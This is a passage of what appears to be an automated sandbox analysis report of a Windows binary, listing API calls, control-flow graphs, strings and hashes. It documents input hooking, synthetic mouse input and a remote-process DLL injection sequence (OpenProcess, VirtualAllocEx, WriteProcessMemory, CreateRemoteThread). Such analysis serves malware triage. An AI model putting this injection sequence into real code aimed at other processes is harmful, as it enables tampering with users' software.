                                                                              • GetLastError.KERNEL32 ref: 003E1BAD
                                                                              • _printf.MSPDB140-MSVCRT ref: 003E1BB5
                                                                                • Part of subcall function 003E2040: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001,00000000,?,003E1BF7,ERRNO %lu,00000000), ref: 003E2049
                                                                                • Part of subcall function 003E2040: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,?,00000000,?,00000000), ref: 003E2064
                                                                              • GetProcAddress.KERNEL32(00000000,LoadLibraryA), ref: 003E1BD5
                                                                              • GetLastError.KERNEL32 ref: 003E1BE4
                                                                              • GetLastError.KERNEL32 ref: 003E1BEA
                                                                              • _printf.MSPDB140-MSVCRT ref: 003E1BF2
                                                                              • memset.VCRUNTIME140(00000000,00000000,00000068,00000068,00000400,00000014), ref: 003E1C64
                                                                              • GetCurrentProcessId.KERNEL32 ref: 003E1C72
                                                                              • CreateThread.KERNELBASE(00000000,00000000,Function_00002510,00000001,00000000,00000000), ref: 003E1D0A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.4133837283.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.4133813463.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.4133855820.00000000003E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.4133873490.00000000003E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.4133892481.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.4133912924.00000000003E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.4133935444.00000000003EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_3e0000_ib.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast$_printf$AddressCreateCurrentHandleModuleProcProcessThread__acrt_iob_func__stdio_common_vfprintfmallocmemset
                                                                              • String ID: ERRNO %lu$LoadLibraryA$Z:\usr\bin\di.dll$kernel32.dll$xinput1_3
                                                                              • API String ID: 2494052705-1576103940
                                                                              • Opcode ID: b1d053c47c12f98793ee080659fd857fe8a61c8051826dd120b9719b594ef11b
                                                                              • Instruction ID: 6b2b2d27355b2c0ffed9bba69d49c443948143d7f97ce08d2a9b52a46db90282
                                                                              • Opcode Fuzzy Hash: b1d053c47c12f98793ee080659fd857fe8a61c8051826dd120b9719b594ef11b
                                                                              • Instruction Fuzzy Hash: 53617BB09003949FDB21DF55D849B9ABBF4FB08314F108669E914AF3D1D7B69904CB90

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 135 3e1459-3e1468 SetWindowsHookExA 136 3e149c-3e14a9 GetLastError 135->136 137 3e146a-3e1487 GetLastError MessageBoxA 135->137 140 3e151d-3e1523 UnhookWindowsHookEx 136->140 141 3e14ab-3e14c1 136->141 138 3e148d-3e1496 PostQuitMessage exit 137->138 139 3e1529 137->139 138->136 140->139 142 3e14c7-3e14d8 PeekMessageA 141->142 143 3e14da-3e14e6 TranslateMessage DispatchMessageA 142->143 144 3e14e8-3e14ef 142->144 143->144 145 3e150c-3e1517 Sleep 144->145 146 3e14f1-3e14f8 144->146 145->142 148 3e1519-3e151c 145->148 146->145 147 3e14fa-3e1506 SetCursorPos 146->147 147->145 148->140
                                                                              APIs
                                                                              • SetWindowsHookExA.USER32(0000000E), ref: 003E145B
                                                                              • GetLastError.KERNEL32 ref: 003E146A
                                                                              • MessageBoxA.USER32(00000000,UNSUPPORTED WINE!!!,Please contact with developer, to add support.,00000000), ref: 003E147E
                                                                              • PostQuitMessage.USER32(-00000001), ref: 003E148E
                                                                              • exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000001), ref: 003E1496
                                                                              • GetLastError.KERNEL32 ref: 003E149C
                                                                              • PeekMessageA.USER32(003E6520,00000000,00000000,00000000,00000001), ref: 003E14D4
                                                                              • TranslateMessage.USER32(003E6520), ref: 003E14DF
                                                                              • DispatchMessageA.USER32(003E6520), ref: 003E14E6
                                                                              • SetCursorPos.USER32 ref: 003E1506
                                                                              • Sleep.KERNELBASE(00000003), ref: 003E150E
                                                                              • UnhookWindowsHookEx.USER32 ref: 003E1523
                                                                              Strings
                                                                              • UNSUPPORTED WINE!!!, xrefs: 003E1477
                                                                              • Please contact with developer, to add support., xrefs: 003E1472
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.4133837283.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.4133813463.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.4133855820.00000000003E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.4133873490.00000000003E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.4133892481.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.4133912924.00000000003E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.4133935444.00000000003EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_3e0000_ib.jbxd
                                                                              Similarity
                                                                              • API ID: Message$ErrorHookLastWindows$CursorDispatchPeekPostQuitSleepTranslateUnhookexit
                                                                              • String ID: Please contact with developer, to add support.$UNSUPPORTED WINE!!!
                                                                              • API String ID: 462765712-1537259461
                                                                              • Opcode ID: ad35e484b9b646301ddf56127c900be342d8b0603697fbb4fdbc4c0a54e0b777
                                                                              • Instruction ID: eb78d9c7095b07bdb4bfe9d09317ae8eafdbff203d9ddb1534c696f468b9f618
                                                                              • Opcode Fuzzy Hash: ad35e484b9b646301ddf56127c900be342d8b0603697fbb4fdbc4c0a54e0b777
                                                                              • Instruction Fuzzy Hash: 3D116A327403E0ABE7331BA7AC8AB54BF7CA76A751F050360F302991E0C6B15940CF25

                                                                              Control-flow Graph

                                                                              APIs
                                                                                • Part of subcall function 003E2A11: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,003E259B,00000010), ref: 003E2A26
                                                                              • _beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,003E1610,00000000,00000000,00000004,00000004,027C55B8), ref: 003E157F
                                                                              • ?_Throw_Cpp_error@std@@YAXH@Z.MSVCP140(00000001), ref: 003E159F
                                                                              • _Thrd_detach.MSVCP140(00000000,?), ref: 003E15A7
                                                                              • ?_Throw_C_error@std@@YAXH@Z.MSVCP140(00000000), ref: 003E15B5
                                                                              • ?_Throw_Cpp_error@std@@YAXH@Z.MSVCP140(00000006), ref: 003E15C4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.4133837283.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.4133813463.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.4133855820.00000000003E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.4133873490.00000000003E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.4133892481.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.4133912924.00000000003E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.4133935444.00000000003EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_3e0000_ib.jbxd
                                                                              Similarity
                                                                              • API ID: Throw_$Cpp_error@std@@$C_error@std@@Thrd_detach_beginthreadexmalloc
                                                                              • String ID: jjh
                                                                              • API String ID: 2396835676-1719336355
                                                                              • Opcode ID: 8c998487302892d7676a35f2a02c0d314cb751fbd08c27a6d1ebf50026330dc4
                                                                              • Instruction ID: b96c19100669bca68ad7a18bdc8072cf972b3f5c1c0b6502e5f4be112744f1f8
                                                                              • Opcode Fuzzy Hash: 8c998487302892d7676a35f2a02c0d314cb751fbd08c27a6d1ebf50026330dc4
                                                                              • Instruction Fuzzy Hash: A41146709402959FDB119F95DD4ABAEB7BCEB08705F000229F9069B2C1EB7559048B54

                                                                              Control-flow Graph

                                                                              APIs
                                                                                • Part of subcall function 003E2A11: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,003E259B,00000010), ref: 003E2A26
                                                                              • _beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,003E1280,00000000,00000000,00000000), ref: 003E11E9
                                                                              • ?_Throw_Cpp_error@std@@YAXH@Z.MSVCP140(00000001), ref: 003E1209
                                                                              • _Thrd_detach.MSVCP140(00000000,?), ref: 003E1211
                                                                              • ?_Throw_C_error@std@@YAXH@Z.MSVCP140(00000000), ref: 003E121F
                                                                              • ?_Throw_Cpp_error@std@@YAXH@Z.MSVCP140(00000006), ref: 003E124A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.4133837283.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.4133813463.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.4133855820.00000000003E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.4133873490.00000000003E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.4133892481.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.4133912924.00000000003E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.4133935444.00000000003EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_3e0000_ib.jbxd
                                                                              Similarity
                                                                              • API ID: Throw_$Cpp_error@std@@$C_error@std@@Thrd_detach_beginthreadexmalloc
                                                                              • String ID:
                                                                              • API String ID: 2396835676-0
                                                                              • Opcode ID: eedc77d8153f13d23239c8f6b2e15080f440ef1f28d3c447f0645fff86d6a9e5
                                                                              • Instruction ID: 251d506a527e36ec43d37456cf2d7cdb410ed5e7695e05550ff4aef8dd1710b9
                                                                              • Opcode Fuzzy Hash: eedc77d8153f13d23239c8f6b2e15080f440ef1f28d3c447f0645fff86d6a9e5
                                                                              • Instruction Fuzzy Hash: E63162B09403549FEB219F65CD49BABBBF8EB04714F00461DE515DB2C0EBB5A904CB90

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 191 3e2000-3e201a CreateMutexA GetLastError 192 3e201c-3e201e exit 191->192 193 3e2024 191->193 192->193
                                                                              APIs
                                                                              • CreateMutexA.KERNELBASE(00000000,00000000,Local\$InputBridge$,003E1DEA,027C55B8,?,?,?,?,003E38C3,000000FF), ref: 003E2009
                                                                              • GetLastError.KERNEL32(?,?,?,?,003E38C3,000000FF), ref: 003E200F
                                                                              • exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(000000FF,?,?,?,?,003E38C3,000000FF), ref: 003E201E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.4133837283.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.4133813463.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.4133855820.00000000003E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.4133873490.00000000003E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.4133892481.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.4133912924.00000000003E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.4133935444.00000000003EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_3e0000_ib.jbxd
                                                                              Similarity
                                                                              • API ID: CreateErrorLastMutexexit
                                                                              • String ID: Local\$InputBridge$
                                                                              • API String ID: 1207567285-3219089667
                                                                              • Opcode ID: 03e50db5a9244d77d45161b4ce8d9c073e91345d5272bba307e76066f56c086f
                                                                              • Instruction ID: a2fa3f0e382c982aac06575273ba4fd6668040155c747ee54391be1f8cfde55a
                                                                              • Opcode Fuzzy Hash: 03e50db5a9244d77d45161b4ce8d9c073e91345d5272bba307e76066f56c086f
                                                                              • Instruction Fuzzy Hash: 4BC04C315542D1D7DE732752ED8DB097A29A758736F250B20F33AE81E1CB604C808515

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 194 3e1050-3e105a 195 3e105c-3e1062 194->195 196 3e1067-3e1075 194->196 195->196 197 3e114f-3e1151 196->197 198 3e107b-3e1089 196->198 199 3e1090-3e10e3 198->199 200 3e10e5-3e10ec 199->200 201 3e1132-3e1147 Sleep 199->201 202 3e10ee-3e10f0 200->202 203 3e10f6-3e1130 SendInput 200->203 201->199 204 3e114d-3e114e 201->204 202->203 205 3e10f2-3e10f4 202->205 203->201 204->197 205->201 205->203
                                                                              APIs
                                                                              • SendInput.USER32(00000001,003E64FC,0000001C), ref: 003E1130
                                                                              • Sleep.KERNELBASE(000003E8), ref: 003E1141
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.4133837283.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.4133813463.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.4133855820.00000000003E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.4133873490.00000000003E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.4133892481.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.4133912924.00000000003E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.4133935444.00000000003EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_3e0000_ib.jbxd
                                                                              Similarity
                                                                              • API ID: InputSendSleep
                                                                              • String ID:
                                                                              • API String ID: 221531666-0
                                                                              • Opcode ID: ab5c5bf0a953a58c479329d5d8b543cb547390a36761abf90b676b96a74f8c78
                                                                              • Instruction ID: fee88cb6ed77754c6919bfca0dcd70650e792806dd95aa6661364bee09ee0bce
                                                                              • Opcode Fuzzy Hash: ab5c5bf0a953a58c479329d5d8b543cb547390a36761abf90b676b96a74f8c78
                                                                              • Instruction Fuzzy Hash: 2321B1309047948FE726CF27D441722BBE2AF6A744F198B5DE4456A1E2D771A8C48B50

                                                                              Control-flow Graph

                                                                              APIs
                                                                                • Part of subcall function 003E2000: CreateMutexA.KERNELBASE(00000000,00000000,Local\$InputBridge$,003E1DEA,027C55B8,?,?,?,?,003E38C3,000000FF), ref: 003E2009
                                                                                • Part of subcall function 003E2000: GetLastError.KERNEL32(?,?,?,?,003E38C3,000000FF), ref: 003E200F
                                                                                • Part of subcall function 003E2000: exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(000000FF,?,?,?,?,003E38C3,000000FF), ref: 003E201E
                                                                                • Part of subcall function 003E1B20: GetModuleHandleA.KERNEL32(kernel32.dll), ref: 003E1B90
                                                                                • Part of subcall function 003E1B20: GetLastError.KERNEL32 ref: 003E1BA3
                                                                                • Part of subcall function 003E1B20: GetLastError.KERNEL32 ref: 003E1BAD
                                                                                • Part of subcall function 003E1B20: _printf.MSPDB140-MSVCRT ref: 003E1BB5
                                                                                • Part of subcall function 003E1530: _beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,003E1610,00000000,00000000,00000004,00000004,027C55B8), ref: 003E157F
                                                                                • Part of subcall function 003E1530: ?_Throw_Cpp_error@std@@YAXH@Z.MSVCP140(00000001), ref: 003E159F
                                                                                • Part of subcall function 003E1530: _Thrd_detach.MSVCP140(00000000,?), ref: 003E15A7
                                                                                • Part of subcall function 003E1530: ?_Throw_C_error@std@@YAXH@Z.MSVCP140(00000000), ref: 003E15B5
                                                                                • Part of subcall function 003E1530: ?_Throw_Cpp_error@std@@YAXH@Z.MSVCP140(00000006), ref: 003E15C4
                                                                              • KiUserCallbackDispatcher.NTDLL(00000000), ref: 003E1DFC
                                                                              • GetSystemMetrics.USER32(00000001), ref: 003E1E05
                                                                                • Part of subcall function 003E2A11: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,003E259B,00000010), ref: 003E2A26
                                                                                • Part of subcall function 003E1160: _beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,003E1280,00000000,00000000,00000000), ref: 003E11E9
                                                                                • Part of subcall function 003E1160: ?_Throw_Cpp_error@std@@YAXH@Z.MSVCP140(00000001), ref: 003E1209
                                                                                • Part of subcall function 003E1160: _Thrd_detach.MSVCP140(00000000,?), ref: 003E1211
                                                                                • Part of subcall function 003E1160: ?_Throw_C_error@std@@YAXH@Z.MSVCP140(00000000), ref: 003E121F
                                                                                • Part of subcall function 003E2A11: _callnewh.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,003E259B,00000010), ref: 003E2A19
                                                                                • Part of subcall function 003E2A11: _CxxThrowException.VCRUNTIME140(?,003E4BFC), ref: 003E2E1D
                                                                                • Part of subcall function 003E2A11: _CxxThrowException.VCRUNTIME140(?,003E4C7C), ref: 003E2E3A
                                                                                • Part of subcall function 003E1EA0: memset.VCRUNTIME140(00000000,00000000,0000002C,003E1E7E,0000002C), ref: 003E1EA5
                                                                                • Part of subcall function 003E2080: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000400,0000000C,00000000), ref: 003E20CD
                                                                                • Part of subcall function 003E2100: Sleep.KERNEL32(000003E8,00000000,00000000,?,?,003E1E9B), ref: 003E211E
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.4133837283.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.4133813463.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.4133855820.00000000003E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.4133873490.00000000003E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.4133892481.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.4133912924.00000000003E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.4133935444.00000000003EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_3e0000_ib.jbxd
                                                                              Similarity
                                                                              • API ID: Throw_$Cpp_error@std@@ErrorLast$C_error@std@@ExceptionThrd_detachThrow_beginthreadexmalloc$CallbackCreateDispatcherHandleMetricsModuleMutexSleepSystemUser_callnewh_printfexitmemset
                                                                              • String ID:
                                                                              • API String ID: 1912642095-0
                                                                              • Opcode ID: 0e32b6c660e0ea9d994dc165807470563923bf5b1204810bfb0759e3668f90bf
                                                                              • Instruction ID: c5bb497e03dc37ad9f718cd7f0438dc30076a24351827b30e1b4eb24c266e006
                                                                              • Opcode Fuzzy Hash: 0e32b6c660e0ea9d994dc165807470563923bf5b1204810bfb0759e3668f90bf
                                                                              • Instruction Fuzzy Hash: 3911A270D002A59BD762EFB6CC46B5F7AADEB40750F004729F1159F2D1EBB45E018B90

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 233 3e2100-3e210c 234 3e2112-3e2114 call 3e2130 233->234 236 3e2119-3e2120 Sleep 234->236 236->234
                                                                              APIs
                                                                                • Part of subcall function 003E2130: WSAStartup.WS2_32(00000202,?), ref: 003E2159
                                                                                • Part of subcall function 003E2130: WSAGetLastError.WS2_32 ref: 003E2163
                                                                              • Sleep.KERNEL32(000003E8,00000000,00000000,?,?,003E1E9B), ref: 003E211E
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.4133837283.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.4133813463.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.4133855820.00000000003E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.4133873490.00000000003E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.4133892481.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.4133912924.00000000003E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.4133935444.00000000003EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_3e0000_ib.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLastSleepStartup
                                                                              • String ID:
                                                                              • API String ID: 608709709-0
                                                                              • Opcode ID: 71f7d8acedf752099ebd1dcdc1fe946ce1d2ab0863972fa3cc2aea988390dcff
                                                                              • Instruction ID: 346fe67c2d0347a36ad2f86b576fad4cfe10a9c0abfdb28984a8f74c8ab5db8e
                                                                              • Opcode Fuzzy Hash: 71f7d8acedf752099ebd1dcdc1fe946ce1d2ab0863972fa3cc2aea988390dcff
                                                                              • Instruction Fuzzy Hash: 7FC080255501B46741031347AC43D3FF25F57D9710F0503197700172D049E03D001AE1

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 284 3e22c0-3e22d3 285 3e22e8-3e22fa OpenProcess 284->285 286 3e22d5 284->286 287 3e22fc-3e2319 VirtualAllocEx 285->287 288 3e2350-3e235a GetLastError 285->288 289 3e22d8-3e22da 286->289 287->288 290 3e231b-3e2330 287->290 291 3e236c-3e2374 288->291 292 3e235c-3e2369 GetLastError call 3e2040 288->292 289->291 293 3e22e0-3e22e6 289->293 290->288 297 3e2332-3e234e CreateRemoteThread 290->297 292->291 293->285 293->289 297->288 298 3e2377-3e237d 297->298 299 3e237f-3e2385 298->299 300 3e2388-3e23cd WaitForSingleObject call 3e2070 CloseHandle call 3e2a11 298->300 299->300
                                                                              APIs
                                                                              • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 003E22F0
                                                                              • VirtualAllocEx.KERNEL32(00000000,00000000,?,00003000,00000004), ref: 003E230C
                                                                              • WriteProcessMemory.KERNEL32(00000000,00000000,?,?,00000000), ref: 003E2328
                                                                              • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000), ref: 003E2341
                                                                              • GetLastError.KERNEL32 ref: 003E2356
                                                                              • GetLastError.KERNEL32 ref: 003E235C
                                                                              • _printf.MSPDB140-MSVCRT ref: 003E2364
                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 003E238B
                                                                              • CloseHandle.KERNEL32(?), ref: 003E23AC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.4133837283.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.4133813463.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.4133855820.00000000003E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.4133873490.00000000003E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.4133892481.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.4133912924.00000000003E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.4133935444.00000000003EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_3e0000_ib.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLastProcess$AllocCloseCreateHandleMemoryObjectOpenRemoteSingleThreadVirtualWaitWrite_printf
                                                                              • String ID: @Rt$DLL Injected successfully with path %s and length %i$ERRNO %lu
                                                                              • API String ID: 736780516-709908767
                                                                              • Opcode ID: 36066e4eaa921415e6a23713b234a9bdef27efcbe43e981f3369ea949d5e09c4
                                                                              • Instruction ID: a9958de52ff7cbac17c42f31ebe0d93dbf56087e94d353774d6911424fadbc65
                                                                              • Opcode Fuzzy Hash: 36066e4eaa921415e6a23713b234a9bdef27efcbe43e981f3369ea949d5e09c4
                                                                              • Instruction Fuzzy Hash: C031F43A600254AFDB269F46DC41F2A7BA9FF89720F158268FA089F2D1D771DC118B60
                                                                              APIs
                                                                              • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 003E31B2
                                                                              • memset.VCRUNTIME140(?,00000000,00000003), ref: 003E31D8
                                                                              • memset.VCRUNTIME140(?,00000000,00000050), ref: 003E3262
                                                                              • IsDebuggerPresent.KERNEL32 ref: 003E327E
                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 003E329E
                                                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 003E32A8
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.4133837283.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.4133813463.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.4133855820.00000000003E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.4133873490.00000000003E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.4133892481.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.4133912924.00000000003E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.4133935444.00000000003EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_3e0000_ib.jbxd
                                                                              Similarity
                                                                              • API ID: ExceptionFilterPresentUnhandledmemset$DebuggerFeatureProcessor
                                                                              • String ID:
                                                                              • API String ID: 1045392073-0
                                                                              • Opcode ID: d58ed1054bcb28fccb2b0829b4d1291259a043aa1f8010e933985be3cfa49286
                                                                              • Instruction ID: 4c890cd2064fd610405ff1f6fdfe31d0f9460082d34f85d530b786582c6148e8
                                                                              • Opcode Fuzzy Hash: d58ed1054bcb28fccb2b0829b4d1291259a043aa1f8010e933985be3cfa49286
                                                                              • Instruction Fuzzy Hash: 08312DB5D4126C9BDB21DF65D9897CCBBB8BF08300F1041A9E50DAB290EB745B898F05
                                                                              APIs
                                                                              • mouse_event.USER32(00000800,00000000,00000000,?,00000000), ref: 003E1767
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.4133837283.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.4133813463.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.4133855820.00000000003E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.4133873490.00000000003E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.4133892481.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.4133912924.00000000003E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.4133935444.00000000003EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_3e0000_ib.jbxd
                                                                              Similarity
                                                                              • API ID: mouse_event
                                                                              • String ID:
                                                                              • API String ID: 2434400541-0
                                                                              • Opcode ID: d9c2f9fedb2385ef7be29012302ce5c2b7c3172ec7b04b6c13113a997043bd8b
                                                                              • Instruction ID: 102b8593b9c9c748487353337ae3f26a4d2cde15a92d3b621c1ad3f7ec1909ce
                                                                              • Opcode Fuzzy Hash: d9c2f9fedb2385ef7be29012302ce5c2b7c3172ec7b04b6c13113a997043bd8b
                                                                              • Instruction Fuzzy Hash: 48716971504696DFD326CF26C9D1B62BBE9FB56700F2487A9D4568F6E9D330E900CB80
                                                                              APIs
                                                                              • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 003E345A
                                                                              Memory Dump Source
